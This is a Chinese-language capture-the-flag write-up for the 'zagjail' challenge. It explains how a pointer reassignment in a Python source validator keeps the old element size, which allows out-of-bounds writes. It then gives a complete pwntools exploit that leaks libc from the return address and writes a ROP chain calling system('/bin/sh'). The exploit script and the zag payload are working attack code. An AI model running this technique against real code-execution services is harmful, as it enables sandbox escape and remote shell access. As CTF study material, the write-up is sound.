zagjail
这题的zag是一个编译器,server.py是能够接收我们发送的源码然后做一些限制,然后会自动利用zag编译器编译并执行编译后的文件,所以我们的目标就是上传一段能拿到shell的源码。
def resolve(name: str) -> tuple[int, int] | None:
if name in arrays: return arrays[name]
if name in scalars: return (1, scalars[name])
return None
这里resolve返回创建的数组的长度和类型大小
for m in re.finditer(r'\bvar\s+(\w+)\s*:\s*\[(\d+)\](\w+)', src):
arrays[m.group(1)] = (int(m.group(2)), TYPE_SIZES.get(m.group(3), 8))
这里说明我们可以用类似 var buf: [256]u8的方法创建数组,buf是数组名,256是长度,u8是类型,在 TYPE_SIZES定义了各个类型的大小
if k == 'VPI':
name, t, arr, idx = _re['VPI'].search(txt).groups()
info = resolve(arr)
if info:
length, _ = info
init_idx = int(idx)
if init_idx < 0 or init_idx >= length:
die(f"Rejected: initial pointer index {init_idx} is out of bounds "
f"for '{arr}' (length {length}).")
ptrs[name] = PtrState(arr, length, TYPE_SIZES.get(t, 8), init_idx)
else:
die(f"Rejected: '{arr}' is not a known array or scalar.")
我们可以用var创建一个指针,name是指针名,t是类型,arr是指向的数组,idx是指向数组的位置
这里会检查指向的位置是否合法
elif k == 'RAB':
ptr, arr = _re['RAB'].search(txt).groups()
if ptr in ptrs:
info = resolve(arr)
if info:
ptrs[ptr].origin = arr
ptrs[ptr].length = info[0]
ptrs[ptr].index = 0
ptrs[ptr].tainted = False
这里是重新定义创建好的指针指向的数组,注意这里只设置了数组的长度,没有设置数组的类型大小
class PtrState:
__slots__ = ('origin', 'length', 'elem_size', 'index', 'tainted')
def __init__(self, origin: str, length: int, elem_size: int, index: int = 0):
self.origin = origin
self.length = length
self.elem_size = elem_size
self.index = index
self.tainted = False
def clone(self) -> 'PtrState':
s = PtrState(self.origin, self.length, self.elem_size, self.index)
s.tainted = self.tainted
return s
也就是说这里的elem.size还是原来的数组的类型
elif k == 'SUB':
name, idx = _re['SUB'].search(txt).groups()
idx = int(idx)
if name in arrays:
length, _ = arrays[name]
if idx < 0 or idx >= length:
die(f"Rejected: '{name}[{idx}]' is out of bounds "
f"for '{name}' (length {length}).")
elif name in ptrs:
bounds_check(name, idx, f"'{name}[{idx}]'")
else:
die(f"Rejected: subscript on untracked variable '{name}'.")
def bounds_check(name: str, offset: int, what: str) -> None:
if name not in ptrs:
return
s = ptrs[name]
if s.tainted:
die(f"Rejected: '{name}' was mutated inside a loop or conditional; "
f"subscript access is not allowed on tainted pointers.")
access = s.index + offset
if access < 0 or access >= s.length:
die(f"Rejected: {what} accesses tracked index "
f"{s.index}{'+' if offset >= 0 else ''}{offset} = {access}, "
f"out of bounds for '{s.origin}' (length {s.length}).")
当我们执行数组或指针操作时例如q[n],就会进行这个检查,这里我们看指针的检查,这里检查的是指针的起始位置加上我们的目标,判断是否超过数组的长度
这里我尝试过创建指针时用与目标数组类型大小不一样的情况,例如
var buf: [256]u8;
var q: *u64 = &dummy
虽然server.py没有对此进行检查,但是经过编译后实际上q还是u8的类型。
那这里我们就可以利用RAB没重设数组类型的漏洞
我们这样写:
var buf: [256]u8;
var dummy: [1]u64;
var q: *u64 = &dummy;
q = &buf;
buf是256长度1字节的,dummy是1长度8字节的
我们创建一个q指针
这时
q.origin = dummy
q.length = 1
q.elem_size = 8
q.index = 0
q.tainted = False
然后我们再利用RAB让它指向的数组为buf
q.origin = buf
q.length = 256
q.elem_size = 8
q.index = 0
q.tainted = False
q[32]就是buf的结尾了,这时如果我们对q[33]操作,这时会进行bound_check检查,access = s.index + offset即access = 0 + 33 = 33,然后检查if access < 0 or access >= s.length:,很明显我们最多能操作q[256],也就是我们成功造成了一个越界操作。
这里我们先利用zag编译这个源码
fn main() i32 {
var buf: [256]u8;
return 0;
}
然后我们看编译后的文件的汇编可以确定buf在rbp - 0x100的位置,那我们q[33]的位置就是我们写的源码里的main函数的返回地址的位置,这里存的是libc地址,我们可以把libc基址存在一个数组方便我们后面复用
var libc: u64 = q[33] - {libc_offset};
这里求libc_offest的方法我采用的是先编译出来,然后用gdb看这个文件,看返回地址存的libc地址相对libc基址的偏移,然后写rop链就行了。
q[33] = libc + {ret};
q[34] = libc + {prdi};
q[35] = libc + {sh};
q[36] = libc + {system};
EXP:
from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
target = ''
file_name = './zag_patched'
libc_name = './libc.so.6'
elf = ELF(file_name)
context.binary = elf
libc = ELF(libc_name)
gdb_ = 1 if ('gdb' in sys.argv) else 0
switch = 1 if ('remote' in sys.argv) else 0
debug = 0 if ('deoff' in sys.argv) else 1
error = 1 if ('error' in sys.argv) else 0
if debug:
context(log_level='debug')
if error:
context(log_level='error')
bps = [
# 0x1234,
# 'main',
# (0xe3b31, 'libc'),
# ('system', 'libc')
]
gdb_cmd = ''
if gdb_ and switch == 0:
gdb_cmd += "set breakpoint pending on\n"
for b in bps:
if isinstance(b, int):
gdb_cmd += f"b *$rebase({hex(b)})\n"
elif isinstance(b, str):
gdb_cmd += f"b {b}\n"
elif isinstance(b, tuple) and len(b) == 2 and b[1] == 'libc':
if 'libc' in locals() and libc:
target = libc.sym[b[0]] if isinstance(b[0], str) else b[0]
gdb_cmd += f'b *($base("libc") + {hex(target)})\n'
else:
log.warning("未加载 Libc,跳过 Libc 断点")
gdb_cmd += "c\n"
if switch:
parts = target.replace(':', ' ').split()
host = parts[-2]
port = int(parts[-1])
p = remote(host, port)
elif gdb_:
p = gdb.debug(file_name, gdbscript=gdb_cmd, aslr=True)
else:
p = process(["python", "test_server.py"])
def s(data): return p.send(data)
def sa(delim, data): return p.sendafter(delim, data)
def sl(data): return p.sendline(data)
def sla(delim, data): return p.sendlineafter(delim, data)
def r(numb=4096): return p.recv(numb)
def ru(delim, drop=True):return p.recvuntil(delim, drop)
def rl(bool): return p.recvline(keepends=bool)
def ra(t=None): return p.recvall(timeout=t)
def rn(numb): return p.recvn(numb)
def cl(): return p.close()
def it(): return p.interactive()
def uc64(data): return u64(data.rjust(8, b'\x00'))
def uu64(data): return u64(data.ljust(8, b'\x00'))
def a(f, off=libc): return lg(hex(off), (ret := f.address + off)) or ret
def cb(data): return data if isinstance(data, bytes) else str(data).encode()
def lg(name, data): return log.success(name + ': ' + (hex(data) if isinstance(data, int) else data.decode(errors='ignore') if isinstance(data, bytes) else str(data)))
def menu(idx, pmt=b'>'): return sla(pmt, str(idx).encode())
def bl(address): return (address).to_bytes(3, 'big')
def ntlbc(leak, offset, name='Libc'): return setattr(libc, 'address', leak - (libc.sym[offset] if isinstance(offset, str) else offset)) or lg(name, libc.address)
def ntpie(leak, offset, name='PIE'): return setattr(elf, 'address', leak - (elf.sym[offset] if isinstance(offset, str) else offset)) or lg(name, elf.address)
def fill(num, content=b'A'): return (content.encode() if isinstance(content, str) else content) * num
def se(s, f=None): return lg(s if isinstance(s, str) else f"bytes: {s.hex()}", (addr := next((f or libc).search(s if isinstance(s, bytes) else s.encode())))) or addr
def shn(target, current_printed): return [((target & 0xffff) - current_printed) % 0x10000, current_printed + (((target & 0xffff) - current_printed) % 0x10000)]
def shhn(target, current_printed): return [((target & 0xff) - current_printed) % 0x100, current_printed + (((target & 0xff) - current_printed) % 0x100)]
_rop_cache = {}
def gg(s, f=None):
target = f or libc
if target not in _rop_cache:
_rop_cache[target] = ROP(target)
rop = _rop_cache[target]
instrs = [x.strip() for x in s.split(';')]
gadget = rop.find_gadget(instrs)
if gadget:
addr = gadget.address
lg(s, addr)
return addr
else:
raise ValueError(f"[-] Critical: Gadget not found: {s}")
def ga(delim=b'|', name='Leak', data=None):
target_data = data if data else ru(delim)
if isinstance(target_data, str):
target_data = target_data.encode()
hex_list = re.findall(b'0x[0-9a-fA-F]+', target_data)
return [lg(f'{name}[{i}]', x) or x for i, x in enumerate([int(a, 16)for a in hex_list])]
#################################################################################
libc_offset = 0x29ca8
ret = gg('ret')
prdi = gg('pop rdi; ret')
sh = se(b'/bin/sh\x00')
system = libc.sym['system']
SRC = f"""\
fn main() i32 {{
var buf: [256]u8;
var dummy: [1]u64;
var q: *u64 = &dummy;
q = &buf;
var libc: u64 = q[33] - {libc_offset};
q[33] = libc + {ret};
q[34] = libc + {prdi};
q[35] = libc + {sh};
q[36] = libc + {system};
return 0;
}}
""".encode()
sa(b"<EOF>.\n", SRC)
sl(b"<EOF>")
it()